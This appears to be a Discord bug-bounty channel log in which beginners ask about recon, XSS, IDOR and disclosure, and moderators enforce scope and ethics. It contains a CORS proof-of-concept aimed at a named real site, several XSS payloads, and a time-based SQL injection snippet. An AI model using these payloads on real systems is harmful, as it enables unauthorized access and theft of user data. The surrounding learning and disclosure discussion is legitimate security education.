#bug-bounty

Not really, I genuinely am not - but thanks anyway

No problem at all

Idk I was really nervous, I am thinking of sending them a message asking them to reach the security team to inform them about a potential risk I found by accident that could lead to severe disclosure

@fast fable

it's lovely that you are concerned, but all you can do is just alert them about it - due to the nature of them having no VDP, you can't do anything else

have to move on

it can also be /.well-known/security.txt

https://www.rfc-editor.org/rfc/rfc9116

22xks

I believe it should be /.well-known/security.txt yes

if I'm not mistaken that's what the rfc says

Yup, I linked the RFC above

@sacred prism please do not post random IP addresses and ask people to hack it. If this happens again you will be banned

Oh my bad. Won’t post again.

Hi all, I am trying bug bounty but so far not getting the bug or even bounty so like to share my methodology and I am thinking to improve it from you all (newKid)

• subdomains : sublist3r / Amass sometimes - find some subdomains any possibilities to takeover
• Xss , but most of the site comes with xss-protection now a days so its very hard - without protection will use some wordlist on the paticular area using burp to find out but nothing comes out
• IDOR, trying IDOR but mostly UUID now a days
• CSRF, added as out of scope
  so any other technique or method or any type of bug easy for beginners please let me know will try other than this what can I try, thanks

For subdomains, use a tool like Aquatone or Gowitness to get screenshots of the websites. IDOR can still exist with UUIDs. Create two accounts to do A/B testing, then the only problem you’ll need is how you can get another one’s UUID. XSS is lucrative, and can work in different contexts so always look at sources and sinks.

Focus on logic-based access control vulnerabilities. Is User A able to view/change/delete User B’s data?

Sure thanks 🙏🏻

Gave +1 Rep to @lilac spindle (current: #24 - 349)

Any tips to weaponize open redirect and have a high impact ?

Can you redirect to a JavaScript URI?

Or, a GET request that performs an action on the site when logged in

Hi guys
I have got a host header injection in a dummy website but now I want to get SSRF but what's happening is in the response content.html is being concatenated on the payload and that's why it's not working
Any suggestions here please?

For subdomains you can try wayback machines data. Just, don't trust Status code on output from tools. Try to check the interesting subdomains manually.

For XSS, try to find where is your data reflect on page/dom.

For IDOR, don't just check for user id. There are lots of ID used on web apps, like Order ID, address ID.

And, you can try with VDPs first to find valid buga and grow your confidence.

Hi all, one doubt lets say I have two user A and B , I can view the info of them in an API, if I set userB's sessionId and session to userA and still I get the user'sB info on that API means it is vulnerable?
note: user A and user B are in different profiles

I would have thought it would be vulnerable if user b could get users A info. user b still getting their own info when trying someone else's credentials is what we would want no? (I could be wrong, I'm new here )

Try requesting a user C. If that works then yes.

Make sure not to request it first so that it isn’t cached or anything

Depends on the info though.

Thanks Jared

Gave +1 Rep to @lavish hollow (current: #6 - 1189)

Thanks Moros, no worries I am also new here 👍

this script:

<html>
     <body>
         <h2>CORS PoC</h2>
         <div id="demo">
             <button type="button" onclick="cors()">Exploit</button>
         </div>
         <script>
             function cors() {
             var xhr = new XMLHttpRequest();
             xhr.onreadystatechange = function() {
                 if (this.readyState == 4 && this.status == 200) {
                 document.getElementById("demo").innerHTML = alert(this.responseText);
                 }
             };
              xhr.open("GET",
                       "https://www.compass.com/account", true);
             xhr.withCredentials = true;
             xhr.send();
             }
         </script>
     </body>
 </html>

what is the point of bug bounty (from the company perspective) when the program forbids utilizing common vulnerability types like csrf, brute forcing etc?

not paying for QA

why is this not working?

it gives back an undefined value

is it even vulnerable?

They are looking for bugs that can cause serious damage that they aren't aware of, something like brute forcing will get reported so many times from automation scanners etc and the risk isn't that high most of the time

So not really worth the hassle

@fallen palm Please don't post a target link, as it is not a THM room.

sorry

reply from hackerone:

Thanks for your report. Based on your initial description, there do not appear to be any security implications as a direct result of this behaviour.
This is expected behavior — if you have another user’s session information/token, you should be able to hijack their session.
If you disagree, please reply with additional information describing your reasoning. Including a working proof-of-concept is the best way to convey the impact of this report and will streamline our assessment of your claims.

expected behavior ? , is this true

You could make an argument that there are additional steps they can take to make the hijacking harder, but I think unless you can provide a proof of concept where you can steal some user's session token (without having it from owning the other account), they won't bother.

I don't get how do people find so many vulnerabilities, I've started looking at some VDPs, and even websites that literally have no account feature (just static sites with a form to subscribe for something) have already dozens of reports submitted. How do I know if it even makes sense for me to participate in VDP? It feels like you have to really be a pro to find anything "in the wild"

The difference is you’re hunting in public programs while they hunt on private programs.

Then there’s also people who have automation set that when a new program goes public they instantly run scanners and tools to get those easy low hanging fruits.

I'm talking about public programs though

I mean - I don't even understand where these websites could have so many vulnerabilities, sometimes it is just a static website/blog with contact form and that's it

I get that I'm a beginner so I don't know much beside basics like SQLi, XSS, IDOR, broken access control etc, but still

maybe I'm missing something

The vulns still need to be triaged, those can be just BS vulns that people submit with no real impact, so its hard to gauge if all of those are BS or legitimate.

How do we implement CSP in Odoo 10 without unsafe inline and unsafe eval ?

Hello anyone know who does raw bug bounty on targets on yt or discord server, twich to watch and learn i want to see their methodology so if anyone knows please do let me know. 😄

i guess nobody does bug bounty live since the point of bug hunting is to disclose vulnerabilities privately

NahamSec on youtube does some live stuff, mainly recon id assume

havent watched much of his stuff as I'm no way near jumping into bug bounty yet, but he's been on my periphery

should i report a bug just if it allows brute force password attacks or do i need to crack it first?

theres also rs0n

Are you checking the scopes for bugbounties?

I'm sure there are some which don't allow bruteforcing

its in the scope and bruteforcing is allowed

How does the bruteforce happen? Is it on a login page?

Yes

I’d say its a valid finding.

Ok

hello guys

are exposed sensitive files like config files, .git considered pentesting? since they are already exposed my the server!

What do you mean? Is this doing bug bounty on a program?

no was trying to tell someone he has exposed files so he takes care

hey people Look what I found German Hacking Event first price 1500 €. https://nis-2-congress.com/talentwettbewerbe/bester-pentester/ if you are German and born after 1985

Hey!

So I am exploiting a time-based SQLi. For this I am using cluster bomb to find each character of a password string.

The problem is that it is getting impossible for me to find a way to let burp suite know to don't send anymore response for a already found brute forced

From the response time I can manually see which character is at what position but burp suite doesn't know this

A thing I could do is write a script but I am not confident enough

Can someone help please?

Due to this more than necessary responses are being sent and it's also time consuming

Try to create a condition to find the length of characters

Well, the website is vulnerable to time based SQLi so the number of characters won't change while changing conditions in the query.

I'm not sure what you mean. What I'm trying to say is you add in a condition to check the length of what you're trying to retrieve. For e.g., AND IF (length(database ()) =1, SLEEP (5), 1) -> This query checks if the length of the database name is 1 character.

You iterate over this till you get something successful, then you have your character length. Now, just bruteforce the amount of characters you found. If the length is 5, just stop after 5 characters.

Or use a binary search and save yourself a tonne of time rather than iterating over it...

Ohh, I have already retieved the lenght of password

The only was to dump the contents of database is by retrieval of each character a time and check if condition for that character is true

Again, binary search should speed that up

Title: DOM-Based XSS (Prototype Poisoning) Vulnerability in ‘/home/search-results' Page

Description:

This report addresses a vulnerability of DOM-Based XSS (Cross-Site Scripting) attack via Prototype Poisoning. This occurs when a script takes user supplied input and passes it to a property, which has been overridden by an attacker. The attack manipulates JavaScript's prototype-based inheritance, leading to arbitrary JavaScript code execution within the user's browser.

Location:

The vulnerability was identified on the ‘https://www.target.com/home/search-results’ page.

Exploitable in both search input fields on the page.

Steps to Reproduce:

Visit the vulnerable page.
Utilize DOM Invader to inject a JavaScript canary string into the DOM, thus poisoning prototypes.
POST JavaScript payload in search query.
Evidence:

Two sinks were found to be vulnerable to this attack:

setTimeout (prototypepollutionhitCallback)
element.innerHTML (<style type=”text/css”></style>)
The page contains two search fields to query for articles on the site. Using the Prototype Poisoning technique, a canary string was used to identify potential DOM-Based XSS vulnerabilities. On page load, both of these sinks are triggered and are immediately exploitable with no further stages needed, other than modifying the canary string to execute arbitrary Javascript code.

In this case, the first XSS injection was of the function ‘alert(’DOM-based XSS successfully exploited!’) upon the setTimeout prototype pollution, to trigger an alert function within my own browser. From this point, an attacker in this position would have the opportunity to leverage this much further.

[image1.png]
I decided to reproduce on the same page, to ensure this wasn’t just an edge case or a cosmic ray :)

[image2.png]

Impact:

This vulnerability is high risk, as it allows an attacker to execute arbitrary JavaScript code in the user's browser. This can potentially lead to the theft of sensitive information, such as session cookies, and allows the attacker to perform actions on behalf of the user.

Recommended Mitigation Steps:

To mitigate this vulnerability, it is recommended to:

Validate, filter, and escape user input before using it as a source in your scripts.
Identify the sources of user input and the sinks where this input ends up.
Implement a strong Content Security Policy (CSP) to reduce the impact of any potential XSS vulnerabilities.
Regularly update and patch all systems to protect against known vulnerabilities.
Consider using frameworks that automatically escape XSS by design, such as React JS.
Ignoring such vulnerabilities may lead to serious security breaches and a loss of trust from your users.

Looks good, you can also add in using vetted third party libraries such as DOMPurifier to handle those cases but that’s just my opinion.

One thing I’d like to point out though that while the impact is true for XSS, try to relate it with their application. Like what can you do after you steal a session? Can we do some nasty stuff with it? Etc.

Like for example, if its a banking app, can you transfer funds from other users to your account?

That’s great thank you for that. They’re a very large company in my country, website is bound to have high traffic count and also boasts a shop on the website. I’ll reference that too! Thanks again!

So happy to get my first bounty

Hello everyone, if a target is using PHPSESSID as a cookie is it safe or is there any chance to manipulate that ?

If you can get XSS and the cookie isn't httpOnly you could get account take over with it

@fast fable sure , someone suggested to try to find the pattern this cookie is based on do you have any idea about how it's created ?

Not feasibly possible, it's a hash of a range of items like the IP, timestamp etc

@fast fable oh ok, so i should focus on xss instead of trying to crack that thing

it's not fixed anyway when i log out and login back it changes for the same user

See if you can use the old value when it changes

yeah ill try that

so what i noticed is that whenever you log in it changes but when you log out it doesn't

i logged in copied the current one changed it with older one it logged me out when i put the copeid when im logged in again is this normal behavior?

Sorry, not quite sure I understand

Are you saying you can login with the old one?

that's how session cookies work

@fast fable simply i login and change the cookie , the account logs out when i set the original one i logged in with it logs me in

i guess it's not an issue like @lilac spindle said

that is precicely what Mknukn said?

hello , i found an xss the waf is blocking me when i put () or `` , but it doesn't block me when i put something like this <img src=x onerror=alert(636 /> neither when i put [] is there any bypass for this ?

what is the best bug bounty platforms for beginner?

Quick question, If you are able to bypass an admin panel but all thats behind it is defunct/non working features is that still worthy of a report?

I want to ask a question? I participated in a bug bounty program and ı wrote bug bounty report and I sent a report but My report was answered negatively. I placed xss payload in report content html source code Afterwards I placed the document.cookie function in the payload and ı saw positive I encountered positive results and i reported it. my report was rejected why? Isn't this a weakness?

Was the issue included in the program scope or any explanation provided as to why it was rejected?

It may be due to self xss

but in scope

Hey
If I found a Heroku Api Key in a JS file what can I do with it ?

Lots of my brothers asking me about what to do after finding secret keyss here you go guyssss...
use this bash script and check all api keys valid or not after that you can report 🙂

https://github.com/gwen001/keyhacks.sh

Yea I’ve been using this for a while, shame it doesn’t support input files tho. Find it gets tedious pretty fast

When I manage to find a dump of 50k+ api keys, testing single entries are a nightmare. Tbf I should just make something to do myself 😂

I cant understand blind xss

It very complicated

I do understand normal xss

if im able to bypass the capcha test, would that be considered a vulnerability

I mean that makes them way more vulnerable to botting right?

(Turned off ping because im a new hacker and would rather let someone more knowledgeable ping you with the answer)

Depends on the functionality its applied on being used

Think of it further; what can happen if this captcha is bypassed? Is there other ratelimiting in place that will lower its impact, etc.

Blind XSS is just being able to execute scripts to be rendered on a page that you don’t have access to

Using callbacks from things like xsshunter will help you find hits with blind

Just need a domain to point it to

And an smtp if you wanna be fancy

So imagine you have an order portal on a website. You find you can break out of an element in the input field of your payment details or delivery notes. You inject your xss payload into that. The staff who view that page with the delivery note on will get hit with the xss

XSSHunter will notify you of any hits

Really useful with Hunter as it also records the dom at the time of execution

Meaning you can get easy escalations to sensitive information exposure

Blinds are a great way to get P1’s

this should help you, really good video on blind - goes over everything i mentioned https://www.youtube.com/watch?v=MjtMLbRw0lI

Wow

I watched this video before You even list it

Nahamsec is the best in bug bounties

thank you

Gave +1 Rep to @surreal karma (current: #616 - 6)

hi

every time i turn foxyproxy on in firefox tell me this

its very annoying

i cant intercept anything in burp suite

You need to add burp certificate to firefox

how to do it?

im a beginner

so idk anything

wait nvm

i did it

https://portswigger.net/burp/documentation/desktop/external-browser-config/certificate/ca-cert-firefox

Oh well done

im in a website that is very hard to run xss on

im ethical btw and its an offical hacker1 bug bounty program

Quick tip: don’t go in looking for specific vulns, you give yourself a harder job.

Map out a threat model for your target, the vulns will come to you once you get an idea of the lay of the land that you’re targeting

Ask yourself, what is the target, what information will they have, what information is important/sensitive, then find out how they handle user interaction, how is data stored & received, where is it stored n received etc

Work your way in with your scopes set

Enumeration is key, find secrets, improper access control, leaked information, api endpoints etc

nmap?

i can now inject xss code in password query

Also maybe dont send session info here

@long dagger if you're doing an active bug bounty, that's fine, but please don't share any URL's etc.

ok im sorry

im sorry

hi guys im currently trying some vdp and i found a JWT that possible revels information about the user

do i submitt the report for this or no? and is not that cookie is alot of them

If when I inject an XSS payload "><img src=x onerror=alert(document.domain)>{{7*7}}' it tells me 500 Internal server error can I do something with this ?

I think thats means that this injection is handled

Im not very professional im bug bounty

So try to google it

here is a quick bug

in one of google Easter eggs named google doodle there is a NPC in one of there doodles when you talk to a spsaific NPC then go to some trophy thing and interact you get that what the NPC says and

then...

YOU GET THAT HINT THAT TAT NPC GAVE YOU (i had some grammer mistakes on this part)

here is another glitch (not a bug): i create glitche in the terminal to create my own terminal features

I found a vulnerability that allows me to leak other users first names using their email address. The first names of the other users is inaccessible from the site. Is this enough to report?

I justify it like this:
Can lead to Phishing and Other further Attacks:
Attackers can utilize the leaked names of users to send more convincing phishing attacks to their email address
While the immediate impact might seem minimal, this vulnerability could potentially be combined with other vulnerabilities or data sources to do further damage
Privacy Breach:
First names are considered personal information and their unauthorized disclosure violates user privacy
Reputational Damage:
Any breach of privacy damages the reputation of the affected organization. Users expect their personal information to be handled securely

Yea, i would say it’s worth reporting as it will come under unauthorised disclosure

Zord:
q = GqlQuery("SELECT * FROM ArtistFan WHERE artistid = :artistid ORDER BY " + sortby + " OFFSET " + str(offset),artistid = artistid)

BadQueryError: Parse Error: Invalid ORDER BY Property at symbol '

Found this error through a GET request. Any idea how it can be exploited

can someone help me with this xss </TITLE><SCRIPT>alert("XSS");</SCRIPT> whenever I put this the website accepts it but it doesn't show an alert

have you whipped out inspect element to make sure its actually being embedded

if the text isn’t shown in inspect element does that mean it isn’t a reflective xss??

yeah I checked the inspect element and its there I can see the payload that I used </TITLE><SCRIPT>alert("XSS");</SCRIPT>

Double click it

It's probably just being treated as text

I did it didn't open @fast fable

Can you show a ss

yea

everytime I put the payload it returns this

@fast fable

I got it

I have a question

@fast fable

Just ask

k

this right here

if it's not being executed it's not xss

no I mean like if the payload I put isn't anywhere to be found in the inspect element does that mean it isn't a rxss

Sure

Hi

I have a issue

What are sites of hunters you are in ?

Does anybody have a recommended template for submitting bug bounties for android or in general for bug bounties?

Bro I are hacking subdomains of apk?

The sentence doesn't make sense.

i ask if did u make search of vulnerabit

on domain apk android

@austere rapids Enough, please just start learning on tryhackme before attempting bug bounty

what is the best platform or course to learn bugbounty cert doesnt matter for me as much as gaining the actual skill to start hunting on platforms like bugcrowd and hackerone

there isnt one "best" but portswigger academy is definetely up there https://portswigger.net/web-security

thank you

Gave +1 Rep to @acoustic ore (current: #833 - 4)

I'd also recommend HTB Academy's bug bounty path. It's not free, but it is very good information. THM also has a web exploitation path I think

already enrolled in htb soc path and its great

yeah, they have a good one for bug bounty too

I Just wacth Some random videos on yt

i didnt know this course . Gives you a cert ?

Idk about certs but definetely covers most of the stuff you would need when doing real world bug bounty and its very interesting in general (very up to date with the addition if race condition labs)

thanks man , good to know tbh

Gave +1 Rep to @acoustic ore (current: #709 - 5)

im going along for OSCP and CCBH

i will give it an eye

Good luck with that!

yeah , im getting bored with eJPT becouse my mom gifted it to me

so yeah

i can give this course a try meanwhile i do eJPT

anyway is this even better than CBBH?

how much is ejpt course + exam ?

I think 220 bucks

Hello, I am new in this bug bounty field. I have submitted two reports on hacker1 but they weren't valid. I have taken many courses on practical bug bounties. but I am stuck after the recon part. What should I do?

Dont quit bro iam stuck on this too

what type of bugs are you reporting

after recon, identify all functionalities, think what attack is possible on that functionality and test it, do it until all functionality is tested

once I reported a bug information disclosure but it was not applicable (funny part is, the day I reported, they corrected it) and second was CORS which they set to be informative.

mostly I do these recons

Guys, I am doing bug bounty on a domain and this is a sample request I intercepted using burp, I think this request takes a query parameters and then on the backend makes another request by adding the query parameters from the original request to another request:

Request: GET /abc-service/abc/profile/getOrganization?empId=499000%20%20+&1=2
Here, the thing is, 499000 is the empId but if I add a whitespace or addition operator or ampersand (&) in the query parameter's value then it gets accepted and response is shown, but if I provide anything else it results in an error, first there might be a chance of SQLi but it returns error on other character..
How can I move forward from here?

there is a cert you can take on the coursework

We won't be proving active help on bug bounties.

Providing

Hi, is there any certification I can take as a bug bounty beginner?

Complete all web fundamentals

Check out portswigger academy too, they have some really useful stuff. Labs too, give yourself a challenge :)

Hey if my Burpsuite is detecting Cross-origin ressource sharing : arbitrary origin trusted does anyone of you know how to exploit it ?

:Dd look into the new room. this is not necesarely a security issue

question for bug bounty hunters , do you always use burpsuite?

Not always.

Owasp ZAP is a adequate alternative.

Thank you

Gave +1 Rep to @unborn ice (current: #1 - 2187)

I do

would you guys put your real name and linkedin profile in a big company hall of fame page, as a reward for a reported bug?

Good clout

You could ask if you are able to use your aliases instead

do you have professional one?

No

Yeah I believe it's possible, but I am both wondering about possible benefits of having my linkedin there (although I stil don't have a security profile to show to recruiters)

Yes.

You're allowed.

IIRC Frostbite is in the Microsoft Hall of fame as his discord handle.

May be wrong, can't find them to ping.

yeah there's plenty of aliases from what I can see

Placing your LinkedIn would be only useful if people read it periodically.

So you think you'd avoid using real name?

Depends on your opsec.

@hollow thistle I'd probably put my aliases in and then mention it in my CV

Where do you use ZAP instead of burp?

Oh that's an option that didn't cross my mind 😯

When I can't use burps Pro features

Any specifics?

Hey umm a doubt, what if I report that a website is working with much lower version. for example there is a website which is using jquery of version 3.3 which have couple of vulnerabilities. As a rectification for that vulnerability it should be upgraded to version 3.5.

What will happen if I submit this as a bug?

depends on the impact of the jquery version and if its directly exploitable

but usually theres not much impact afaik, theres a lot of niche bugs i think on that version but not much to be worried about

It is mentioned that it gives stored xss, however when I tried I failed.

But the jquery version is one which was used in POC

judging by what i've read on HackerOne's programs scopes they are not accepted unless you have a POC exploiting them

Unless there is a way to exploit it, if you just submit an outdated version you will just get an informational

Okk. Thanks for the input..

Hi everyone, I had a doubt, when exploring my targets the subdomains that I have to look for are those that are in scope, but why do some hunters use subdomains in gobuster, subdomainfinder, dirsearch etc mmm???, shouldn't I just look for what are in scope???

sometimes the scope can be *.example.com which means all subdomains under example.com.

Oh ok got it

And this subdomains why are oculted ?

not sure i understand what you mean

No, l I already got , thx

Gave +1 Rep to @lilac spindle (current: #22 - 366)

why you use nmap rather than other fast scanner tool ?

port swigger is good to learn vuln

I have no idea about other scanners.. almost all the videos/blogs I have seen used these .. so I picked one from category ..

yeah .. I am using it too... sometimes ..

the problem of nmap is that slow, there is other tool like naabu do same nmap but in fast way

Rustscan

oh okay ..

I use that for solving thm rooms, didn't know it can use here

Okay

Why would you want to perform a fast network scan of live systems?

That's rhetorical. It's because you're impatient and want results quickly, but haven't considered the possible implications of hitting your target with a lot of traffic quickly.

There's a reason that nmap is still the standard in industry despite faster options being available -- it's because denial of service attacks are nearly always out of scope (both for pen tests and bug bounty), and if the target isn't properly protected then you are significantly more likely to bring it down by hitting it hard.
Also significantly more likely to cause an incident in their SOC which is a waste of a lot of people's time.

i.e. it's reckless, stupid, and shows a dangerous lack of experience of testing in a real world context.

So, that looks good -- including Nmap.
Order looks a little interesting, but 🤷‍♂️

but what ...

The order may depend on what you have found. You can either continue or keep enumerating.

So no biggie

But shrug.
Basically just an open ended "possibly not the best order to approach it, but if it works for you then fine"

well at this stage I am still looking whats gonna work for me

trying every methodology.. all the orders

For web, I'd start with Google dorking and then look for subdomains. Then perhaps directory searching.

Before fuzzing, you can look at the web archive. More effortless and less noisy

fuzzing is mainly for directory search right? or it helps in much more !!

Yeah and for subdomain. Don't forget to limit it tho

Why do u use google dorking ?

To find hidden (not really) documents & pages

Any good try hack me pages to improve on google dorking?

There is 1 or 2.

because I don't want to wait a month to scan more than 200 subdomains with nmap. also in naabu you can select the rate limit you want

So, impatience reeking of recklessness. Wonderful.

Setting a rate limit for it is good, but at that point you're removing the "benefit" of using a faster tool lmao.

hello

need a help like i have a admin panel here i type admin:admin it said nice catch try harder with some gif . Kindly help me

Is this for TryHackMe?

no other challenge

Which other challenge? 🙂

like a challenge given by someone

like this

Then we can't and won't help you.

"given by someone" doesn't exactly fill me with confidence that what you're doing isn't something you're being tested on.

no no its not that can i dm you ?

Not at all.

basically a challenge given by college

you can see it like a CTF

I see it as it's your work, and not ours.

I just saw a post very similar to that one posted in the TCM Security discord. 😅

why are path traversal bugs so popular all of a sudden?

hey guys, i pushed this question on another channel, and a helpful mod told me to ask here

that said

has anyone here done bug bounties before? going for a sanity check, but what is some down-to-earth advice you can give for someone potentially starting on bug bounties? it seems like a promising side hustle, but i like to believe such things don't come easy

in addition to, what is some prerequisite knowledge i need? i need to checklist if im ready for this sort of thing

i also need some statistics! for the much more experienced bug hunters, how many successful submissions do you get in a month or a year?

How I would approach this would be to pick a topic here https://portswigger.net/web-security/all-topics , learn about a specific bug (xss or idors for example), then once you are done with the labs put that newly acquired knowledge to use on a VDP . You will have less competition on a VDP compared to a BBP. Get some valid submissions on a VDP, that will boost your rep, and also unlock the potential for private invites, which will also have less competition on them. After about a month of hacking/ hunting go back to portswiggers and learn a new vuln, rinse and repeat...

Also I wouldn't go in with the mind set that you will make a living off bug Bounty, I would do it for the knowledge itself and the money will follow...

There are also several bug hunting checklists out there, google will be your best friend for this

Even if you get dupes, you're still finding bugs

this is great advice!!

yeah i was talking to professional in the red team field a week or two ago

and he suggested bug bounties as a good project to make my resume stand out

while the money is im mostly just there to learn. cash is just a bonus

Me personally I like to hunt on programs with wildcard domains in scope, there's a good chance you could find something that nobody has tested yet, and then there's easy wins... I would also create 2 accounts on the program I'm hunting on, for when I'm searching for idors... Creating an account will also unlock additional features that can be tested.

One last thing when you find something and you go to report your findings, make sure you can actually exploit the bug... For example you think you've found an account takeover, actually take the account over, otherwise it could be marked as informative and you'll miss out on any rep or money associated with your bug... Think what's the worst thing that could happen if a malicious actor found this bug and then try to see if you can do that, unless the policy explicitly states not too ..

Hey guys I need to start bug bounty is ZAP enough ?

Hey can u give advice to me too brother

Well the advice would be universal advice for any beginner looking to get into bug bounty... As far as is zap enough, any proxy would be good enough to start hunting.. eventually you'll want to start looking into automated recon to get leads. And maybe spinning up a VPS (using any cloud provider) to host some payloads. Heres a video on recon process https://m.youtube.com/watch?v=Z9es1_BUXmQ&pp=ygUIbmFoYW1zZWM%3D and another for setting up a basic VPS to hack from https://m.youtube.com/watch?v=qlX5jR7Z4uo&t=329s @river kraken

Y do I need to setup some box can't I use a vm ?

Ping me

Hey where did u go ?

At work rn... Sure you can use a VM ... May want to use a VPN then, so your IP doesn't get blocked while scanning.. I guess it all depends on what you are hunting for. For some bugs you are going to need to have a way for your payload to call back whether it's a burp collaborator session or a server you can control. But I think the last video will / can explain it better

Hello everyone, i am new here, and i started learning about bug bounty recently.
Currently i am learning XSS vulnerabilty, do you recommend me hunting through automation, or manual testing.
If manual testing is better, do i need to know a lot of java script or just the basics.
Thanks!

Can you confirm the scope?

What scope?

For the bug bounty.

We have no idea what you're doing, so if you'd like help, you'd need to confirm.

It's a private program on Intigriti.

If you can't provide a scope, we can't help, and I'd like to ask for you stop asking for help also. 🙂

Ah you asking to see If it's an Illegal or no?

Pretty much.

Yup got it, thanks <3.

I'd recommend looking for xss manually, automated tools can miss a lot... You can use automation to hunt for xss but may receive false positives, so will need to verify any automated findings. I'd recommend automation for hunting parameters, then manually test for xss on those parameters. As far as js the basics are sufficient to find xss but a deep dive on js can help with more complex xss. Here's a few good xss cheat sheets https://portswigger.net/web-security/cross-site-scripting/cheat-sheet , https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

i'm taking nahamsec intro to bug bounty course and try to do the lab https://tryhackme.com/r/room/nahamsecsudemylabs I'm connected to tryhackme vpn and tried using tryhackme attack box but can't ssh into the machine. Which username and password should I use to ssh into the machine?

why would you ssh into a web site bug bounty course teaching machine??? would it not make more sense to connect using firefox in the browser

#room-help please.

Room is marked or tagged as private.

Oh bob damn it.

I forgot I can see some of those rooms.

Hay, we don't allow members to help with private rooms, as you're doing a course, please seek help from peers or whomever is teaching you.

I'm pretty sure I answered this question in nahamsec's discord also .... No need for ssh ... Start the machine and edit your /etc/hosts file, visit website...

Thank you so much @lilac bough

Gave +1 Rep to @lilac bough (current: #103 - 62)

Hello everyone, i am new and i have a question, is it a good idea to just look for XSS on my targets, as it is the only vulnerability i know at this time, and it is maybe the most common found vulnerability, thanks

I would say yes, sure you might miss out on other bugs during your testing but the thing is, once you are confident finding xss in hardened targets you can branch off and learn new vuln types. You can always go back and retest that program for the new vulns you just learned. But if you want vulns that are similar to testing for xss, you could always learn different injections like SQL, command, template, etc... or could always learn how to hunt for idors... That's a pretty easy one to spot .. honestly it's up to you though

Thank you so much @lilac bough

Gave +1 Rep to @lilac bough (current: #101 - 63)

Hi everyone, i am looking for people who are relatively new, or begginers in bug bounty to collaborate with, so maybe we can help each other, thank you everyone!

I am so new to it I haven't even gotten past the wanting to learn how to do it stage.

hi guys,

I have a question about domain security and potential vulnerabilities. Suppose a company owns a primary domain for its online services, but I noticed that similar domain names with different extensions (e.g., .ae , .co) are available for registration.

Could the availability of these similar domains pose a security risk, such as phishing or brand misuse? Any use of reporting these?

Yes, that's called typo squatting and it's a common method.

I mean they will probably mark it as informative.. so not really worth reporting.

Intercom] Launcher is disabled in settings or current page does not match display conditions
/api/v2/paths/outline?pathCode=:1

    Failed to load resource: the server responded with a status of 404 ()

I have this error, how can I fix this?

it works

@ancient prism totally plausible risk. My agency used something like sub latin char for some other char that looks like the same damn letter if you don't count pixels

than we do pt from that domain

What is the best way to go form doing tryhackme ctf's to getting into bug bounty? Are there CTF's geared towards learning bug bounty? Not expecting to make money more just for fun and something new to learn.

The difference between bug bounty and ctf is that during a bug bounty scope you're looking to see if there is a vulnerability.

With a ctf you're looking for something that is intentionally vulnerable to something.

Up !

Are There any CTF that are geared towards learning bug bounty or is CTF not the place to start?

I’m interested in this. It’s something I am trying to do, just not very good at it right now

Hi everyone!
Looking for experienced collaborators for Bug Bounty programs.
No beginners or amateurs, please!
Thanks in advance.

Here are a few ctf style https://mctf.io/mini-zine code=mixed . Solve 5 of the 6 challenges and get a month of free access to the entire Antisyphon Cyber Range. This is from Black hills Info Sec.

Hackerone ctf
https://ctf.hacker101.com/

Hackinghub
http://hackinghub.io/

Nahamstore THM
https://tryhackme.com/r/room/nahamstore

And then there's portswiggers
https://portswigger.net/web-security/all-topics

I think the Nahamstore is really not well done, the description promises to learn the basics but there is no introduction other than that you should add the server and its subdomains to the hosts file

it requires that you already know everything, it is basically a what can you do task

Basically a ctf... I think it's a good experience since on actual bug hunting engagements you are basically in the same position, except here you know for sure this is vulnerable and to what bugs.. just need to do a little research

Combine this with portswiggers labs and you should be good to go for testing.

hi

guys am studying for bug bounty

do u guys know any way to increase skills

thanks for sharing the code with us.

Gave +1 Rep to @lilac bough (current: #78 - 79)

I found a vulnerability in Olay's system (Insecure privileges) but they don't have a bug bounty program or a VDP or security disclosure page , what approach should I take to report the issue?

Ruh Roh.

You could notify their IT team, however don't even mention a reward.

However they could take action.

Should I contact them via their normal contact email?

Is there a security.txt file ?

Here https://hackerone.com/proctergamble?type=team

Thanks, didn't realize to look for companies above it.

Gave +1 Rep to @lilac bough (current: #78 - 80)

guys can you suggest bigginer friendly bug bounty platform

How would you rate beginner friendly?

i am a fresher on bug bounty so why i asked

Just my 2 cents but I don’t think there are beginner friendly platforms.

I’d say Intigriti was one of the easiest to get started in.

thank you brother🫂

hi

Guys can anyone guide me

easiest bug to find in all websites is ? #bug-bounty

Stored XSS probably up there

Idors is another easy one to find... Doubt you'll be able to find an "easy" bug in "all" websites but xss and idors are probably a good place to start looking.

How is that begging to be hacked? Also they're not even validated by H1

I'm not surprised they have had to make that statement tho. I've seen a few people asking for a reward from VDPs due to not reading the scope properly

Basic VDP terminology... Generally not a lot of hunters are actually hunting on VDPs because of the lack of payments,, so a good place for people trying to "practice"

But there is a debate about large companies like this using VDPs ... When they are large enough to pay for serious bugs ....

I can see smaller / start up companies beginning with VDPs but as a bigger corporation and serious reports come in you should value your company's security and invest back into it and researchers... Just my opinion... Not like they are just wasting money by paying a researcher that found a crit...

I've also heard of some bigger companies that have public VDPs that state they do not pay for bugs but also have a private program where they pay for crits ... Which is weird that some hunters could get paid while others won't (assuming they found the same bug)...

I mean, to meet compliance you get a pentest (amongst other things). Don't forget: community submissions -- be they bug bounty or VDP -- are supplementary to a proper security programme, not instead of.

it's expected that a VDP is not going to find really significant thing, if the company participating has even a modicum of competency in their security program

Unless the thing that's found is an actual 0day

Bug bounty / VDP submissions can be really useful for being made aware of issues, 100%, but they are far less reliable than, y'know, paying a team with all the relevant qualifications to thoroughly assess the systems.

This is also very sketchy imo.
VDPs exist to give researchers legal protection to responsibly disclose findings. I do get where you're coming from with the just reward thing, but no one is obligated to give you money for something you've done voluntarily, unless they've made it explicitly clear that they are open to doing that.

Frankly, your suggestion that you should just sell the data instead of telling the company is a massive red flag. It tells us that you value money over ethics. It tells us that you are willing to compromise a company (and potentially thousands or more customers) simply because they're not willing to pay you to not do that.
Which, frankly, is scummy af.

Is it a choice between "hand them free security" and "sell their data"?
Because if so, yes, you're meant to take option A. That's what an ethical hacker does.

In reality it's more nuanced than that. If you don't want to actively hunt VDPs, that's fine (and I don't even remotely blame you if you value your time). That's not why VDPs exist anyway. They exist so that if you stumble across a flaw, you are safe to report it without fear of legal repercussions.

If, heaven forbid, you did accidentally find a way to leak user data from a company with a VDP but no bug bounty, then yes, as a security researcher I would expect you to report it with no expectation of a reward.

That's literally the difference between a white hat and a black hat.

And yes, orgs tend to have their own best interests at heart -- over those of their customers -- but that doesn't mean you get a free pass to stick it to them. Especially if it involves customer data.

How many real people do you think get hurt every time there's a data breach? Yes, it hurts the company in fines and reputation, but the users themselves also end up compromised, identities stolen, whatever (depending on what gets nicked obviously).

